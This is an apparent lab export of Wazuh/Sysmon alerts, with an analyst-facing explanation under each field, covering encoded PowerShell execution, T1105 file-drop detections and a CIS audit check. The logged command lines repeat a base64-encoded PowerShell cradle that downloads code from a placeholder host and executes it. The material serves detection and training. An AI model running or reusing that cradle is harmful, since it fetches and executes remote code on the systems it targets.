data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:28.089 ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} ProcessId: 15520 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} ParentProcessId: 12304 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:28.089
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda0-680a-a60b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd9c-680a-a40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:32.779+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:32.779+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  93
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534372.1853162
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:30.2971724Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285328
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:30.274 ProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} ProcessId: 15520 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ulxacboz.arb.ps1 CreationUtcTime: 2025-04-24 22:39:30.274 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:30.274
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda0-680a-a60b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ulxacboz.arb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:30.274
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:39:35.428+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:35.428+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Removable Storage' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534375.1855931
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26160
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Removable Storage' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit user attempts to access file system objects on a removable storage device. A security audit event is generated only for all objects for all types of access requested. If you configure this policy setting, an audit event is generated each time an account accesses a file system object on a removable storage. Success audits record successful attempts and Failure audits record unsuccessful attempts. If you do not configure this policy setting, no audit event is generated when an account accesses a file system object on a removable storage. The recommended state for this setting is: Success and Failure. Note: A Windows 8.0, Server 2012 (non-R2) or newer OS is required to access and set this value in Group Policy.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing removable storage may be useful when investigating an incident. For example, if an individual is suspected of copying sensitive information onto a USB drive.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Removable Storage
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Removable Storage"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Removable Storage"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:35.647+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:35.647+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  90
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534375.1859856
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:33.0039060Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285351
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:31.869 ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} ProcessId: 6888 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bda0-680a-a60b-000000000e00} ParentProcessId: 15520 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:31.869
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda3-680a-a80b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bda0-680a-a60b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:35.674+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:35.674+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  94
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534375.1867923
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:33.2686532Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285352
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:33.220 ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} ProcessId: 6888 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_em23qzpd.dwf.ps1 CreationUtcTime: 2025-04-24 22:39:33.220 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:33.220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda3-680a-a80b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

